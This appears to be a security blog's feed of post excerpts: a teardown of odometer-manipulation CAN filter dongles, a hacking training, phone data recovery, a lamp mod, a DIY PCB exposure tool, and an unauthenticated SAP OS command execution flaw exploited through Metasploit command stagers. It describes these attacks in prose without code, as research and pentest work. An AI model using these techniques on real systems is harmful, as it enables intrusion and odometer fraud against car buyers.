I have read an article on the teardown of a dashboard mileage manipulator dongle on Hackaday. A “CAN bus filter” device was found in a vehicle, connected to the back of its instrument cluster. When it was removed and the original connections were restored, the odometer immediately showed 40 000 kilometers more than before. The author made a quick teardown and analysis on the device but because it was supposed to be locked (according to the article), the firmware was not extracted, leaving the big question unanswered: What it does and how it does it?
Mileage manipulation is illegal in many countries and one could easily go to jail if kept doing it. Still, this is quite common practice on the used car market and mileage manipulator devices could be easily purchased by anyone. The main purpose of these “greyish” tools is to mislead and to fool the buyers. Considering this, I was happy to extend my “to be hacked” list with them, and I also wanted to see how they work and if there is anything to do against the “attack”. Everything was set for a cool project combining car hacking, hardware hacking and reverse engineering. Due to the nature of the topic, I expect readers with less relevant technical knowledge as well, so I tried to provide a bit more details and explanation, to make sure everyone can follow along.
These boards can be found on eBay for $15-25, e.g. by searching for “18 in 1 Universal CAN Filter“. Several sellers are providing them under different fantasy names and with some variance in their supported vehicle list. I decided to order two type of CAN filters from two different sellers. They had the same functionalities, but their PCB looked a bit different. Both CAN filter devices support a bunch of car models from two major German OEMs (just look for the description in the eBay product pages). After one makes the mileage manipulation, this device will prevent the odometer’s sync and increase, by manipulating the relevant communication. For easier reference, I am calling them as #blue CAN filter and #green CAN filter in the following sections.
“Hacktivity is the biggest event of its kind in Central & Eastern Europe. About 1000 visitors are coming from all around the globe every year to learn more about the latest trends of cybersecurity, get inspired by people with similar interest and develop themselves via comprehensive workshops and training sessions”.
Since many years, this hacker conference is a stable point in the year for me as a visitor, or sometimes as a presenter. This year was special, because instead of presenting and giving a talk I decided to go there with a training.
Hardware hacking is a topic that is for some reason not that much addressed in our region by professionals. As this is both a hobby and a profession for me, I was happy to provide the Reverse Engineering & Hacking Hardware training to people who wanted to step into this area.
Recently I have received a request to check data recovery possibilities from a damaged Sony Xperia Z5 Premium smartphone. The phone was dropped and it stopped working. No screen, no charging, no communication on any interfaces, no sign of life, it was nothing more than a brick. Well, a brick, with tons of useful data on it without any cloud synchronisation or offline backup. Needless to say how important was for the owner to get his priceless information back from the device.
Some damage identification and recovery probes were already conducted by other professional parties, even a new screen was ordered and tried, but none of the activities provided any promising result. After the failed attempts the owner almost gave up the hope, but fortunately, we had a common acquaintance and this is how I came to the picture. Due to the previous investigations the phone arrived to me partially dismantled, without a battery and with some metal shields already removed.￼
When we moved to our new home we tried to find modern LED lamps for the ceiling lights but it was not an easy task. The requirements were simple:
Light source should be LED strip/bulb/module
Sufficient overall brightness for a room lightning
LED lamps available on the market were good for decoration illumination only, almost none of their brightness level reached the level of a traditional 100W incandescent lightning (1600 lumen). We found some powerful ones, but their light was direct to one direction and not diffused, so their main application could be great e.g. for dining table lightning but not for a whole room illumination.
It took couple of months, a plenty of visits in different shops and a lot of wasted time by browsing several web stores before we really realized, that no lamp will match to our needs and we have to find another solution. So, we changed the approach and tried to find standard ceiling lamps, which could be subject of a customization and upgrade.
During our journey in Krakow we found a nice one (Nowodvorski Tokyo) in the local OBI market, made by Nowodvorski, a Polish company. This lamp is designed to handle two T8/G13 fluorescent tubes. The package did not contain the tubes but the lamp only. We loved the wood frame, the sandblasted glass, the overall design and it seemed to be a good candidate for further modifications, so we made our decision and bought it.
Later at home I started the upgrade process with dismantling:
In the past years I always had some DIY electronics related projects, which I tried to make somehow at home. For prototyping the breadboards are fine, but as soon as you have to make the next steps to create a stable and final hardware, you should work with PCBs. I do not count with pre-made prototype PCBs, which have their structured and distributed pads and traces across the board. These are not so good for SMD parts, moreover, the overall look with them will be most probably just simply disgusting not professional.
So, if you would like to work with your own designed and nice PCBs, then you can chose from several PCB manufacturers who support hobbyists with low cost and low quantity PCB production. However, for early prototyping there are some issues with them:
You have to wait 1-2 weeks or even more before you get your boards, or you should pay much more for fast production/delivery.
HW development is pretty much the same as SW development. In case of a complex project, there is a big chance to have some issues with your first (and second, and third…) board. So you have to pay for every variants and wait much more for the production/delivery.
If you make PCBs often, it is definitely worth to create your own “PCB fab” at home, to be able to prototype your own PCBs quickly. Then, if it is still necessary, you can order the final version from a professional manufacturer.
I am not a big fan of the toner transfer and other alternate methods and as I used to make projects in the school by photoresist PCBs, I decided to create an UV exposure “tool” for this purpose.
Plenty of DIY PCB UV exposure tool building posts are available on the internet with total different approaches. I also designed my own, to fulfill my needs: it should be relative small and portable and the hacking/modding should be fun. 🙂 Flat bed scanners were found as possibly good target. Compared to most of the other scanner mods, which use LED arrays or fluorescent tubes across the whole scanner bed area, my plan was to use the scanner carriage with only few LEDs and control its movement (and brightness) under the given PCB.
After a quick search on the local second hand portal I found a nice old Mustek 1200CP for about 4 EUR. I made the investment 🙂 and started the work.
Still SAP, still the same OS command execution vulnerability I mentioned in my previous post. But what is the difference? Well, it is good if you can run OS commands on the target system but probably you would like something more. Yes, I am talking about binary payloads.
As it is possible to execute OS commands through the ConfigServlet it is relatively easy to deliver binary payloads and execute them through metasploit’s command stagers. These stagers convert the binary payloads to ASCII deliverable format and use OS commands to write out the payload and the stager line by line and finally execute the payload through the dropped stager. Because VBS is more common in windows environment than PS I chose CmdStagerVBS.
If you ever tried to search for SAP vulnerabilities then I am sure you met some form of ERPScan’s team awesome researches. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well known vulnerabilities for them.
We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot about an exploitation of a simple, remote, authentication less OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I tried to search for existing exploit implementations for this vulnerability but there were no public metasploit or other exploits available. Surprisingly not just exploits were not available but there were no relevant search results to this vulnerability so I decided to create a metasploit module for that.